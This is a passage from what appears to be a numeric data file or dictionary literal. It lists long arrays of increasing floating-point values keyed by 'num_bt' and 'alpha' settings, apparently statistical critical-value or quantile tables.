alpha = 0.025': [2.5299072265625002e-05, 0.00024230957031250004, 0.0006191101074218749, 0.0010908813476562499, 0.0016253967285156249, 0.0022049560546874994, 0.002818878173828124, 0.0034599609374999984, 0.004123382568359373, 0.004805480957031248, 0.005503570556640623, 0.006215515136718748, 0.006939605712890622, 0.007674499511718747, 0.008419036865234372, 0.009172302246093746, 0.00993350219726562, 0.010701965332031247, 0.011477020263671874, 0.01225823974609375, 0.013045196533203126, 0.013837402343750003, 0.014634552001953127, 0.015436401367187505, 0.01624252319335938, 0.01705279541015626, 0.017866912841796888, 0.018684692382812514, 0.01950595092773439, 0.020330505371093766, 0.021158172607421893, 0.02198883056640627, 0.022822357177734398, 0.023658630371093774, 0.0244975280761719, 0.025338928222656272, 0.0261827087402344, 0.02702880859375003, 0.027877166748046904, 0.028727600097656278, 0.029580169677734407, 0.03043469238281253, 0.03129116821289066, 0.03214947509765629, 0.03300961303710941, 0.033871520996093786, 0.03473507690429691, 0.03560028076171879, 0.03646707153320316, 0.03733538818359378, 0.038205230712890656, 0.039076538085937536, 0.03994924926757815, 0.04082336425781253, 0.0416988220214844, 0.04257556152343753, 0.0434535827636719, 0.04433288574218753, 0.04521334838867191, 0.046095031738281285, 0.04697787475585941, 0.04786187744140629, 0.048746917724609415, 0.04963311767578129, 0.05052029418945316, 0.051408569335937536, 0.052297821044921915, 0.05318811035156253, 0.05407931518554691, 0.054971496582031286, 0.055864654541015656, 0.05675866699218753, 0.057653594970703166, 0.05854943847656254, 0.05944613647460942, 0.06034368896484379, 0.06124203491210941, 0.06214123535156253, 0.06304122924804689, 0.06394195556640625, 0.06484353637695311, 0.06574584960937499, 0.06664895629882814, 0.067552734375, 0.06845730590820315, 0.06936254882812501, 0.07026846313476565, 0.07117510986328127, 0.0720824890136719, 0.07299047851562504, 0.07389913940429693, 0.07480847167968757, 0.0757184143066407, 0.07662896728515634, 0.0775401916503907, 0.07845202636718757, 0.07936447143554692, 0.0802775268554688, 0.08119113159179692, 0.08210534667968755, 0.08302011108398444, 0.08393548583984381, 0.08485134887695317, 0.08576782226562504, 0.08668484497070317, 0.08760235595703128, 0.08852041625976564, 0.08943902587890629, 0.09035812377929692, 0.0912777709960938, 0.09219790649414067, 0.09311853027343756, 0.09403964233398443, 0.09496130371093756, 0.09588339233398444, 0.0968059692382813, 0.09772897338867192, 0.0986525268554688, 0.09957650756835942, 0.1005009155273438, 0.10142581176757817, 0.1023511352539063, 0.10327688598632817, 0.10420312500000006, 0.10512979125976571, 0.10605682373046885, 0.10698434448242197, 0.10791223144531262, 0.10884054565429699, 0.10976928710937511, 0.11069845581054699, 0.11162799072265636, 0.11255795288085949, 0.11348828125000013, 0.1144190368652345, 0.11535015869140638, 0.11628170776367203, 0.1172135620117189, 0.11814584350585955, 0.11907849121093769, 0.12001150512695333, 0.12094488525390645, 0.1218786315917971, 0.12281274414062524, 0.12374722290039086, 0.12468206787109398, 0.1256172180175784, 0.1265527343750003, 0.12748861694335972, 0.12842480468750034, 0.12936135864257847, 0.13029827880859407, 0.13123544311523466, 0.13217303466796904, 0.13311093139648467, 0.13404913330078155, 0.1349876403808597, 0.1359265136718753, 0.13686569213867217, 0.1378051757812503, 0.13874496459960967, 0.1396851196289065, 0.1406255187988284, 0.1415662841796878, 0.1425072937011722, 0.14344866943359408, 0.14439028930664094, 0.14533227539062532, 0.1462745056152347, 0.14721704101562533, 0.14815982055664095, 0.1491029663085941, 0.15004635620117224, 0.15099005126953163, 0.15193405151367223, 0.15287829589843788, 0.15382284545898478, 0.15476763916015668, 0.15571273803710983, 0.15665808105468798, 0.1576037292480474, 0.158549682617188, 0.1594958190917974, 0.16044226074218804, 0.16138900756835994, 0.16233599853515684, 0.16328323364257874, 0.16423071289062563, 0.16517849731445378, 0.16612652587890692, 0.16707479858398505, 0.16802331542968818, 0.1689720764160163, 0.16992114257812568, 0.17087045288086006, 0.17181994628906322, 0.17276974487304764, 0.17371978759765705, 0.17467007446289146, 0.1756205444335946, 0.176571319580079, 0.17752233886718838, 0.17847360229492276, 0.17942504882812588, 0.180376739501954, 0.18132873535156335, 0.18228091430664145, 0.1832333374023446, 0.18418594360351648, 0.1851388549804696, 0.18609194946289148, 0.18704528808593834, 0.1879988708496102, 0.1889526367187508, 0.18990664672851643, 0.19086090087890706, 0.19181533813476648, 0.1927700195312509, 0.1937249450683603, 0.19468005371093844, 0.1956353454589853, 0.19659094238281344, 0.1975467224121103, 0.19850268554687595, 0.1994588928222666, 0.20041528320312602, 0.20137191772461044, 0.2023287353515636, 0.20328579711914174, 0.20424304199218862, 0.20520046997070424, 0.20615814208984484, 0.20711599731445424, 0.20807409667968862, 0.2090323791503918, 0.2099908447265637, 0.21094949340820435, 0.21190838623046998, 0.2128674621582044, 0.21382678222656382, 0.21478628540039196, 0.21574591064453258, 0.21670584106445445, 0.21766589355468885, 0.21862612915039198, 0.2195866088867201, 0.22054727172851696, 0.2215081176757826, 0.22246914672851698, 0.2234304199218764, 0.2243918151855483, 0.22535345458984518, 0.2263152770996108, 0.22727722167968895, 0.22823941040039208, 0.22920178222656395, 0.23016433715820456, 0.23112707519531395, 0.23208999633789207, 0.23305310058593892, 0.2340163879394545, 0.23497985839843888, 0.23594351196289198, 0.23690734863281387, 0.2378713684082045, 0.2388355712890639, 0.23979995727539205, 0.24076452636718892, 0.24172921752929832, 0.24269415283203272, 0.24365921020507958, 0.24462451171875144, 0.24558993530273582, 0.24655554199218893, 0.24752133178711083, 0.24848730468750146, 0.24945346069336088, 0.2504197387695327, 0.25138626098632966, 0.252352905273439, 0.25331973266601715, 0.2542866821289078, 0.2552538757324234, 0.25622119140625155, 0.25718869018554846, 0.25815637207031406, 0.25912417602539217, 0.26009222412109523, 0.2610603942871108, 0.2620286865234389, 0.26299722290039207, 0.26396588134765775, 0.2649347229003921, 0.265903686523439, 0.2668728942871109, 0.2678422241210954, 0.26881167602539235, 0.269781311035158, 0.27075112915039246, 0.2717211303710956, 0.2726912536621112, 0.27366156005859565, 0.2746319885253926, 0.27560260009765825, 0.27657339477539267, 0.2775443115234396, 0.27851541137695524, 0.2794866333007834, 0.2804580383300803, 0.28142956542968967, 0.2824012756347678, 0.2833731689453147, 0.28434518432617406, 0.2853173828125022, 0.28628970336914283, 0.28726220703125216, 0.288234832763674, 0.28920764160156465, 0.29018063354492396, 0.29115368652343954, 0.29212698364258016, 0.2931004028320332, 0.29407394409179877, 0.2950476684570331, 0.29602151489258, 0.29699554443359555, 0.2979696960449236, 0.2989440307617205, 0.2999184875488299, 0.3008930664062518, 0.3018678283691424, 0.30284277343750177, 0.3038177795410174, 0.3047930297851581, 0.30576834106445505, 0.3067438354492207, 0.3077195129394551, 0.30869531250000204, 0.3096712341308614, 0.31064733886718954, 0.3116235656738302, 0.3125999145507833, 0.31357644653320516, 0.31455310058593955, 0.3155299377441426, 0.3165068969726582, 0.31748397827148633, 0.31846124267578324, 0.3194385681152363, 0.3204161376953144, 0.3213937683105488, 0.3223715820312518, 0.32334957885742366, 0.32432763671875176, 0.32530587768554864, 0.32628424072265805, 0.32726278686523613, 0.32824145507812674, 0.3292202453613299, 0.33019915771484554, 0.33117825317383, 0.33215747070312696, 0.33313681030273634, 0.3341163330078145, 0.3350959777832052, 0.3360757446289083, 0.33705563354492396, 0.3380357055664084, 0.33901589965820533, 0.3399962158203147, 0.34097671508789285, 0.34195727539062726, 0.34293801879883035, 0.34391888427734596, 0.34489993286133036, 0.345881042480471, 0.34686233520508036, 0.3478437500000022, 0.3488253479003929, 0.3498070068359398, 0.3507888488769554, 0.3517708129882835, 0.35275289916992414, 0.3537351074218773, 0.35471749877929926, 0.3557000122070336, 0.3566826477050805, 0.35766540527343993, 0.35864828491211187, 0.3596313476562526, 0.36061453247070574, 0.3615978393554714, 0.3625812683105496, 0.3635648193359403, 0.36454849243164344, 0.36553234863281536, 0.3665163269042998, 0.3675004272460968, 0.36848464965820615, 0.36946899414062806, 0.3704534606933625, 0.3714381103515656, 0.37242288208008123, 0.3734077148437531, 0.3743927307128938, 0.37537792968750316, 0.3763631896972688, 0.37734857177734693, 0.37833413696289386, 0.37931976318359695, 0.3803055725097688, 0.3812915039062532, 0.38227755737305014, 0.3832637329101596, 0.3842500915527377, 0.3852365112304721, 0.38622311401367526, 0.3872097778320347, 0.3881966247558629, 0.38918359375000366, 0.3901706848144568, 0.3911578979492225, 0.3921452331543007, 0.39313269042969146, 0.39412033081055087, 0.39510803222656654, 0.396095916748051, 0.397083923339848, 0.3980719909668011, 0.39906024169922305, 0.4000486145019575, 0.4010371093750045, 0.40202572631836386, 0.4030144653320358, 0.4040033874511765, 0.40499237060547344, 0.4059815368652391, 0.406970764160161, 0.40796017456055167, 0.4089496459960986, 0.40993930053711425, 0.4109290771484424, 0.4119189758300831, 0.41290899658203617, 0.4138991394043018, 0.4148894042968799, 0.4158797912597706, 0.4168703002929737, 0.4178609313964893, 0.4188516845703174, 0.4198426208496143, 0.4208336181640674, 0.42182479858398925, 0.42281604003906736, 0.42380746459961427, 0.4247989501953173, 0.42579061889648917, 0.42678240966797354, 0.42777432250977043, 0.4287662963867236, 0.42975845336914553, 0.4307507324218799, 0.43174313354492677, 0.4327356567382862, 0.4337283020019581, 0.43472106933594257, 0.43571395874023955, 0.43670697021484894, 0.4377001647949271, 0.43869342041016157, 0.43968679809570854, 0.4406802978515679, 0.4416739807128961, 0.44266772460938053, 0.44366165161133364, 0.444655639648443, 0.4456498107910212, 0.4466440429687556, 0.4476384582519587, 0.44863293457031805, 0.4496275939941462, 0.4506223144531306, 0.4516172180175837, 0.4526122436523493, 0.4536073303222712, 0.45460260009766185, 0.4555979919433649, 0.4565935058593805, 0.45758914184570865, 0.4585848999023493, 0.4595807189941462, 0.4605767211914118, 0.4615728454589899, 0.46256909179688055, 0.4635654602050836, 0.4645619506835992, 0.4655585632324273, 0.4665552978515679, 0.4675522155761772, 0.4685491943359428, 0.46954629516602087, 0.4705435180664115, 0.4715408630371145, 0.47253833007813006, 0.4735359802246144, 0.474533691406255, 0.47553152465820814, 0.47652954101563005, 0.4775276184082081, 0.4785258178710987, 0.4795242004394581, 0.48052264404297373, 0.48152127075195816, 0.48251995849609886, 0.4835188293457082, 0.48451776123047385, 0.48551687622070827, 0.4865161132812552, 0.4875154113769583, 0.4885148925781302, 0.4895144958496146, 0.49051416015625526, 0.4915140075683646, 0.4925139770507865, 0.4935140686035209, 0.4945142822265678, 0.49551455688477086, 0.4965150146484427, 0.4975155944824271, 0.498516296386724, 0.49951712036133333, 0.5005180664062553, 0.5015191955566459, 0.5025203857421928, 0.5035216979980522, 0.5045231323242241, 0.5055246887207084, 0.5065264282226615, 0.5075282287597708, 0.5085302124023489, 0.5095322570800832, 0.5105344238281301, 0.5115367736816457, 0.5125392456054738, 0.5135417785644582, 0.5145444946289112, 0.5155473327636767, 0.5165502319335985, 0.5175533142089891, 0.5185565185546922, 0.5195598449707078, 0.520563293457036, 0.5215668640136767, 0.5225705566406299, 0.5235744323730518, 0.5245783691406299, 0.5255824279785205, 0.5265866699218799, 0.5275909729003955, 0.5285954589843799, 0.5296000061035205, 0.53060473632813, 0.531609588623052, 0.5326145019531302, 0.5336195983886772, 0.5346248168945368, 0.5356301574707087, 0.536635620117193, 0.5376412658691462, 0.5386469726562556, 0.5396528015136776, 0.5406588134765683, 0.5416648864746153, 0.5426711425781311, 0.5436775207519593, 0.5446839599609435, 0.5456905822753967, 0.5466973266601624, 0.5477042541503968, 0.5487112426757875, 0.5497183532714908, 0.5507256469726627, 0.5517330017089908, 0.5527405395507875, 0.5537481994628969, 0.5547559204101625, 0.555763824462897, 0.5567719116211002, 0.5577800598144597, 0.5587883300781316, 0.559796783447272, 0.5608052978515689, 0.5618139953613345, 0.5628228149414126, 0.5638317565918033, 0.5648408203125065, 0.5658500671386784, 0.5668593750000064, 0.5678688659668031, 0.5688784179687562, 0.569888153076178, 0.5708980102539124, 0.5719080505371156, 0.572918151855475, 0.5739284362793031, 0.5749387817382873, 0.5759493103027403, 0.5769599609375059, 0.5779707946777403, 0.5789816894531309, 0.5799927673339903, 0.581003906250006, 0.5820152282714902, 0.583026672363287, 0.5840382995605525, 0.5850499877929743, 0.586061859130865, 0.5870738525390681, 0.5880859680175837, 0.5890982055664118, 0.5901106262207086, 0.5911231689453179, 0.5921358337402397, 0.593148620605474, 0.5941615905761771, 0.5951746215820365, 0.5961878356933645, 0.5972011718750051, 0.5982146911621143, 0.5992282714843798, 0.6002420349121141, 0.601255920410161, 0.6022699890136766, 0.6032841186523483, 0.6042984313964889, 0.6053128662109418, 0.6063274841308636, 0.6073422241210978, 0.6083570861816446, 0.609372070312504, 0.6103872375488321, 0.6114024658203164, 0.6124179382324259, 0.6134334716796915, 0.6144491882324258, 0.6154650268554726, 0.6164809875488318, 0.6174971313476599, 0.6185133972168005, 0.6195297851562537, 0.6205463562011756, 0.62156304931641, 0.622579864501957, 0.6235968627929728, 0.624613983154301, 0.6256312866210977, 0.6266486511230508, 0.627666259765629, 0.6286839294433634, 0.6297017822265666, 0.6307197570800823, 0.6317379150390666, 0.6327561950683634, 0.6337745971679728, 0.6347931823730509, 0.6358118896484416, 0.636830780029301, 0.6378497924804729, 0.6388689880371136, 0.6398882446289104, 0.6409077453613322, 0.6419273681640666, 0.6429471130371135, 0.6439670410156292, 0.6449870910644573, 0.6460072631835979, 0.6470276184082072, 0.6480481567382853, 0.6490688171386759, 0.6500895996093791, 0.6511105651855509, 0.6521317138671915, 0.6531529846191445, 0.65417437744141, 0.6551959533691444, 0.6562177124023475, 0.6572395935058631, 0.6582615966796912, 0.6592838439941443, 0.6603061523437536, 0.6613287048339879, 0.6623513183593784, 0.6633741760253941, 0.6643971557617221, 0.6654202575683626, 0.6664435424804719, 0.6674670104980499, 0.6684906005859405, 0.6695143737792998, 0.6705383300781278, 0.6715624084472683, 0.6725866699218775, 0.6736110534667993, 0.6746356201171898, 0.6756603698730491, 0.6766853027343771, 0.6777103576660176, 0.6787355957031268, 0.6797609558105485, 0.680786499023439, 0.6818122253417983, 0.6828381347656263, 0.6838641662597668, 0.6848903808593759, 0.6859167785644539, 0.6869432983398444, 0.6879700622558599, 0.6889969482421879, 0.6900239562988285, 0.6910512084960941, 0.6920785827636722, 0.6931062011718753, 0.6941339416503908, 0.6951618652343751, 0.6961899108886719, 0.6972182006835937, 0.6982466125488281, 0.6992752075195313, 0.7003039855957032, 0.7013329467773438, 0.7023620910644531, 0.7033914184570312, 0.7044208679199219, 0.7054505615234375, 0.7064804382324218, 0.7075104370117186, 0.7085406188964841, 0.7095710449218747, 0.7106015930175779, 0.7116323242187497, 0.7126632995605465, 0.7136943969726558, 0.7147256774902339, 0.7157571411132807, 0.7167888488769525, 0.7178206787109368, 0.718852752685546, 0.7198849487304678, 0.7209173889160146, 0.7219500122070303, 0.7229828186035144, 0.7240158081054674, 0.7250489807128891, 0.7260823364257797, 0.727115875244139, 0.7281496582031232, 0.7291836242675761, 0.7302177734374978, 0.7312521057128883, 0.7322866210937476, 0.733321380615232, 0.7343563232421851, 0.735391448974607, 0.7364268188476538, 0.7374623107910131, 0.7384980468749974, 0.7395340270996068, 0.740570190429685, 0.7416065368652319, 0.7426430664062477, 0.7436798400878882, 0.7447167968749976, 0.745753997802732, 0.7467913818359352, 0.7478290100097633, 0.7488668212890602, 0.7499048156738258, 0.7509430541992165, 0.7519815368652322, 0.7530202026367164, 0.7540591125488257, 0.7550982055664038, 0.756137542724607, 0.7571770629882788, 0.7582168273925757, 0.7592568359374975, 0.7602970275878881, 0.7613374633789037, 0.7623781433105442, 0.7634190063476535, 0.7644601135253878, 0.7655014648437471, 0.7665430603027313, 0.7675848388671843, 0.7686269226074186, 0.7696691894531217, 0.7707117004394498, 0.7717543945312467, 0.7727973937988248, 0.773840637207028, 0.7748840637206998, 0.775927795410153, 0.7769717712402312, 0.7780159301757782, 0.7790603942871064, 0.7801050415039031, 0.7811499938964813, 0.7821951904296846, 0.7832406311035127, 0.7842863159179657, 0.7853322448730439, 0.7863784790039033, 0.7874248962402315, 0.7884716186523409, 0.7895186462402316, 0.790565856933591, 0.7916133728027316, 0.7926611328124972, 0.7937091979980441, 0.7947575073242159, 0.7958060607910128, 0.7968549194335909, 0.7979040832519503, 0.7989534912109345, 0.8000032043457, 0.8010531616210906, 0.8021033630371063, 0.8031539306640595, 0.8042047424316376, 0.8052558593749971, 0.8063072814941378, 0.8073589477539035, 0.8084109191894505, 0.8094631958007787, 0.8105157775878881, 0.8115686645507788, 0.8126218566894508, 0.8136753540039038, 0.8147291564941382, 0.815783264160154, 0.8168376770019509, 0.817892395019529, 0.8189474182128885, 0.8200028076171854, 0.8210585021972635, 0.822114501953123, 0.8231708679199198, 0.8242275390624979, 0.8252845153808573, 0.8263418579101541, 0.8273995666503885, 0.8284575805664042, 0.8295158996582009, 0.8305746459960915, 0.8316336975097633, 0.8326930541992165, 0.8337528381347633, 0.8348129882812475, 0.835873443603513, 0.8369342651367161, 0.8379955139160128, 0.8390570678710908, 0.8401190490722626, 0.8411813964843721, 0.8422441101074188, 0.8433071899414032, 0.8443706970214814, 0.8454345703124971, 0.8464988098144502, 0.8475634765624972, 0.8486285705566378, 0.8496940917968722, 0.850759979248044, 0.8518262939453097, 0.8528930358886692, 0.8539602050781222, 0.8550277404785128, 0.8560957641601533, 0.8571642150878876, 0.8582331542968719, 0.8593024597167936, 0.8603722534179654, 0.8614425354003873, 0.8625132446289029, 0.8635844421386684, 0.8646560668945277, 0.8657282409667931, 0.8668008422851524, 0.8678739318847616, 0.8689475097656209, 0.8700216369628865, 0.871096252441402, 0.8721713562011676, 0.8732470092773394, 0.8743231506347614, 0.8753998413085895, 0.876477081298824, 0.8775548706054644, 0.878633148193355, 0.879712036132808, 0.8807915344238236, 0.8818715209960891, 0.8829521789550733, 0.8840333862304638, 0.8851151428222607, 0.8861975708007762, 0.8872806091308544, 0.888364257812495, 0.8894485168456981, 0.89053344726562, 0.8916189880371043, 0.8927052612304637, 0.8937921447753855, 0.8948797607421822, 0.8959679870605416, 0.8970570068359321, 0.8981466979980416, 0.899237121582026, 0.9003282775878855, 0.9014202270507762, 0.9025129089355418, 0.9036063842773386, 0.9047005920410105, 0.90579565429687, 0.9068915710449169, 0.907988281249995, 0.9090858459472607, 0.9101842651367139, 0.9112835388183546, 0.9123837890624952, 0.9134848937988234, 0.9145869750976514, 0.9156899719238232, 0.9167939453124949, 0.917898956298823, 0.9190049438476511, 0.9201119689941354, 0.9212200317382758, 0.9223292541503852, 0.9234395141601509, 0.9245509338378853, 0.9256635131835885, 0.9267772521972604, 0.9278922729492135, 0.9290085144042916, 0.9301259765624946, 0.9312448425292913, 0.9323649902343693, 0.933486541748041, 0.9346094970703066, 0.9357339172363223, 0.936859863281244, 0.9379873962402282, 0.9391164550781187, 0.940247161865228, 0.9413795776367123, 0.942513763427728, 0.9436497192382748, 0.9447875671386655, 0.9459273071288999, 0.9470690612792906, 0.9482128906249937, 0.9493588562011657, 0.9505070800781187, 0.9516576232910093, 0.9528105468749936, 0.9539660339355404, 0.9551240844726497, 0.9562849426269465, 0.9574486083984307, 0.9586152648925711, 0.9597850952148367, 0.960958282470696, 0.9621348876953054, 0.9633151550292897, 0.9644993896484303, 0.9656876525878834, 0.9668803100585867, 0.968077667236321, 0.9692799682617116, 0.9704875793456958, 0.9717009887695238, 0.9729205017089769, 0.9741467285156175, 0.9753802795410081, 0.9766218261718677, 0.9778722229003832, 0.9791323242187425, 0.9804033508300707, 0.9816867675781177, 0.982984222412102, 0.9842979736328051, 0.9856308288574146, 0.9869865722656176, 0.9883705139160083, 0.989790344238274, 0.9912579650878833, 0.9927941894531177, 0.9944410705566334, 0.996317932128899], 'num_bt = 200, alpha = 0.1': [0.0005266952514648437, 0.0026622009277343754, 0.005522804260253907, 0.008751449584960939, 0.012211112976074221, 0.015833129882812498, 0.01957775115966797, 0.023419113159179696, 0.02733966827392579, 0.031326751708984385, 0.03537067413330079, 0.03946403503417971, 0.04360103607177738, 0.047776947021484405, 0.05198780059814457, 0.05623039245605472, 0.060501899719238306, 0.06480010986328127, 0.06912288665771488, 0.07346855163574223, 0.07783550262451176, 0.08222236633300783, 0.08662792205810552, 0.09105125427246098, 0.09549121856689458, 0.09994697570800787, 0.10441783905029303, 0.10890296936035163, 0.11340183258056649, 0.11791374206542979, 0.12243816375732434, 0.12697463989257826, 0.13152271270751967, 0.1360819244384767, 0.14065181732177745, 0.14523216247558604, 0.14982250213623055, 0.15442260742187514, 0.15903209686279313, 0.1636506652832033, 0.168278160095215, 0.17291435241699235, 0.17755886077880872, 0.18221160888671892, 0.1868722915649416, 0.19154083251953144, 0.19621692657470724, 0.20090049743652366, 0.20559139251709008, 0.21028930664062526, 0.21499423980712914, 0.2197060394287112, 0.2244245529174807, 0.2291496276855471, 0.23388118743896508, 0.2386191558837893, 0.24336330413818386, 0.2481136322021487, 0.2528699874877932, 0.25763236999511746, 0.26240062713623075, 0.26717460632324247, 0.27195438385009796, 0.27673973083496123, 0.2815306472778324, 0.2863271331787113, 0.2911289596557621, 0.2959362792968754, 0.30074878692626994, 0.30556663513183635, 0.31038967132568407, 0.3152178192138677, 0.32005115509033255, 0.32488945007324277, 0.3297328567504889, 0.33458114624023505, 0.33943439483642646, 0.3442926025390632, 0.34915561676025453, 0.35402343750000065, 0.35889614105224676, 0.36377349853515695, 0.36865566253662174, 0.37354255676269593, 0.37843410491943424, 0.38333030700683657, 0.3882311630249029, 0.39313659667968803, 0.39804668426513723, 0.40296134948730516, 0.4078805923461919, 0.41280441284179736, 0.4177328109741217, 0.42266563415527403, 0.4276031112670905, 0.4325450134277351, 0.4374914169311531, 0.4424423980712899, 0.44739788055420004, 0.45235778808593835, 0.45732227325439534, 0.4622911834716805, 0.46726467132568444, 0.47224258422851645, 0.4772250747680672, 0.48221199035644613, 0.48720348358154386, 0.492199478149415, 0.49720005035400483, 0.5022051239013681, 0.5072147750854501, 0.5122290039062509, 0.5172478103637705, 0.5222712707519543, 0.5272993087768567, 0.5323320007324233, 0.5373693466186538, 0.5424113464355484, 0.5474580764770525, 0.5525096130371112, 0.5575658798217793, 0.5626268768310567, 0.567692756652834, 0.5727635192871114, 0.5778391647338887, 0.5829196929931661, 0.5880052566528342, 0.5930957794189475, 0.5981914138793967, 0.6032921600341818, 0.6083980178833028, 0.6135090637207052, 0.6186254501342794, 0.6237471008300801, 0.6288740921020528, 0.634006576538088, 0.6391444778442403, 0.6442880249023457, 0.6494372177124044, 0.6545920562744161, 0.6597527694702168, 0.6649192810058613, 0.6700918197631853, 0.6752703857421893, 0.6804551315307634, 0.6856461334228532, 0.690843467712404, 0.6960472869873062, 0.7012576675415054, 0.7064747619628922, 0.711698722839357, 0.7169297027587906, 0.7221677780151383, 0.7274131011962908, 0.7326659011840839, 0.7379263305664081, 0.7431945419311543, 0.7484706878662131, 0.7537550735473655, 0.7590478515625023, 0.7643492507934593, 0.7696595764160179, 0.7749789810180687, 0.7803078460693382, 0.7856464004516623, 0.7909950256347678, 0.7963540267944358, 0.8017237854003927, 0.80710460662842, 0.8124971008300801, 0.8179015731811543, 0.823318634033205, 0.8287487411499042, 0.8341925048828143, 0.8396506118774432, 0.845123825073244, 0.8506128311157246, 0.8561184692382833, 0.8616418838500997, 0.8671839904785177, 0.8727460861206076, 0.8783294677734395, 0.8839356613159199, 0.8895665740966816, 0.8952240371704121, 0.9009105682373066, 0.9066288375854512, 0.9123821258544944, 0.9181743240356468, 0.9240102386474631, 0.9298956680297872, 0.9358380889892599, 0.9418471908569359, 0.9479356384277366, 0.9541212844848657, 0.9604301452636743, 0.9669025039672876, 0.9736086273193385, 0.9806913375854518, 0.9885530853271509], 'num_bt = 200, alpha = 0.05': [0.00025646209716796877, 0.0017797088623046878, 0.004100608825683594, 0.0068597412109375, 0.009901237487792966, 0.013143997192382809, 0.016539649963378908, 0.0200567626953125, 0.023673591613769536, 0.027374267578125014, 0.031146888732910168, 0.03498214721679687, 0.03887271881103515, 0.04281265258789061, 0.046796989440917945, 0.0508216857910156, 0.054883308410644496, 0.05897872924804685, 0.06310550689697261, 0.06726142883300776, 0.07144443511962884, 0.0756529235839843, 0.07988521575927726, 0.08414009094238271, 0.08841632843017569, 0.09271270751953116, 0.09702823638916008, 0.101362075805664, 0.10571338653564448, 0.11008140563964841, 0.11446544647216796, 0.11886489868164063, 0.1232790756225586, 0.12770744323730468, 0.13214962005615233, 0.13660499572753904, 0.14107326507568357, 0.14555389404296878, 0.15004657745361333, 0.154551010131836, 0.15906673431396487, 0.16359352111816405, 0.16813098907470705, 0.17267898559570313, 0.1772372055053711, 0.1818053436279297, 0.18638324737548825, 0.19097068786621088, 0.19556743621826167, 0.20017326354980466, 0.2047880172729492, 0.20941154479980467, 0.21404361724853516, 0.2186841583251953, 0.2233330154418945, 0.22798995971679686, 0.23265491485595705, 0.23732772827148438, 0.2420083236694336, 0.24669654846191408, 0.25139225006103516, 0.25609542846679695, 0.2608059310913086, 0.26552360534667974, 0.2702483749389649, 0.27498023986816417, 0.27971904754638677, 0.28446472167968756, 0.28921718597412116, 0.29397636413574224, 0.29874225616455086, 0.30351470947265635, 0.3082937240600586, 0.3130792236328125, 0.3178710556030273, 0.3226693725585936, 0.3274739456176757, 0.3322847747802734, 0.33710178375244143, 0.341925048828125, 0.3467544174194337, 0.3515898895263674, 0.356431465148926, 0.3612790679931643, 0.36613262176513695, 0.37099212646484403, 0.37585765838623075, 0.3807290649414065, 0.38560634613037126, 0.3904895782470705, 0.3953786087036135, 0.4002734375000002, 0.40517414093017595, 0.4100806427001955, 0.4149929428100588, 0.41991104125976586, 0.42483486175537133, 0.4297644805908206, 0.4346998977661136, 0.43964103698730506, 0.44458789825439493, 0.4495405578613286, 0.45449901580810603, 0.4594631958007818, 0.4644331741333013, 0.4694088745117193, 0.4743904495239264, 0.4793777465820319, 0.48437084197998115, 0.4893698120117194, 0.4943745803833015, 0.49938522338867264, 0.5044017410278328, 0.5094241333007821, 0.5144524765014657, 0.5194866943359384, 0.5245269393920908, 0.5295732116699228, 0.5346254348754893, 0.5396837615966807, 0.5447482681274425, 0.549818801879884, 0.5548955917358409, 0.5599785614013684, 0.5650677871704115, 0.5701633453369155, 0.5752653121948257, 0.5803736877441421, 0.5854884719848648, 0.5906098937988296, 0.595737800598146, 0.6008724212646499, 0.6060138320922865, 0.6111619567871107, 0.6163170242309584, 0.6214789581298841, 0.626647987365724, 0.6318241882324231, 0.6370075607299817, 0.6421982574462901, 0.6473963546752941, 0.652602005004884, 0.6578152847290049, 0.6630363464355478, 0.6682652664184578, 0.6735021209716805, 0.678747215270997, 0.6840005493164072, 0.6892622756958018, 0.6945326232910167, 0.6998117446899426, 0.7050997924804701, 0.7103969955444349, 0.7157034301757828, 0.7210194778442398, 0.7263452148437517, 0.7316809463500995, 0.7370269012451192, 0.7423833084106466, 0.7477504730224629, 0.7531287002563496, 0.7585182952880878, 0.7639195632934588, 0.7693328857421893, 0.7747586441040055, 0.7801972198486344, 0.785649147033693, 0.7911147308349626, 0.796594657897951, 0.8020893096923847, 0.8075993728637716, 0.813125457763674, 0.8186683273315452, 0.824228668212893, 0.8298072433471704, 0.8354051208496118, 0.8410232925415064, 0.8466627502441431, 0.8523247909545921, 0.858010711669924, 0.8637222671508811, 0.8694609832763693, 0.875228843688967, 0.8810282135009788, 0.8868616104125999, 0.8927320098876976, 0.8986429977417016, 0.9045986175537135, 0.9106038284301785, 0.9166648864746121, 0.922789039611819, 0.9289858245849636, 0.9352674484252956, 0.9416502380371119, 0.9481566238403347, 0.9548195648193389, 0.961690254211429, 0.9688574218750032, 0.9765015029907258, 0.9851329803466828], 'num_bt = 200, alpha = 0.025': [0.00012660980224609377, 0.0012133789062500006, 0.0031041336059570313, 0.00547554016113281, 0.00816616058349609, 0.011087417602539059, 0.014185523986816401, 0.017424774169921872, 0.020780448913574223, 0.024234161376953132, 0.027772254943847663, 0.031383972167968746, 0.03506069183349609, 0.03879554748535156, 0.042582817077636705, 0.046417617797851536, 0.0502959060668945, 0.05421424865722652, 0.058169593811035106, 0.06215934753417964, 0.06618122100830073, 0.07023315429687496, 0.07431339263916009, 0.0784202575683593, 0.08255237579345695, 0.08670837402343741, 0.09088710784912102, 0.09508750915527336, 0.09930858612060539, 0.10354949951171868, 0.10780941009521477, 0.11208747863769523, 0.11638309478759756, 0.12069564819335926, 0.12502437591552723, 0.12936889648437494, 0.13372867584228512, 0.13810310363769526, 0.14249187469482413, 0.14689445495605458, 0.1513105392456054, 0.15573974609374996, 0.1601816940307617, 0.16463607788085938, 0.1691025161743164, 0.17358085632324222, 0.1780707168579102, 0.1825718688964844, 0.18708415985107427, 0.19160713195800783, 0.1961407852172852, 0.20068489074707038, 0.20523906707763678, 0.20980331420898446, 0.21437740325927743, 0.21896118164062506, 0.2235544204711915, 0.2281569671630861, 0.23276882171630878, 0.2373896789550783, 0.2420194625854494, 0.2466580200195314, 0.25130535125732434, 0.25596115112304696, 0.26062549591064466, 0.26529823303222666, 0.26997913360595704, 0.27466827392578125, 0.27936550140380856, 0.28407066345214843, 0.28878376007080075, 0.2935047149658203, 0.2982334518432618, 0.3029698181152345, 0.3077138137817384, 0.31246543884277356, 0.3172245407104493, 0.3219910430908204, 0.32676502227783205, 0.3315462493896485, 0.3363348007202148, 0.3411306762695312, 0.3459336471557617, 0.35074386596679696, 0.35556118011474624, 0.3603855895996096, 0.36521709442138695, 0.37005554199218776, 0.3749010848999026, 0.3797535705566409, 0.3846130752563479, 0.3894794464111331, 0.3943527603149417, 0.3992329406738284, 0.4041200637817386, 0.4090139770507816, 0.4139148330688479, 0.4188224792480471, 0.42373706817626977, 0.4286584472656253, 0.433586692810059, 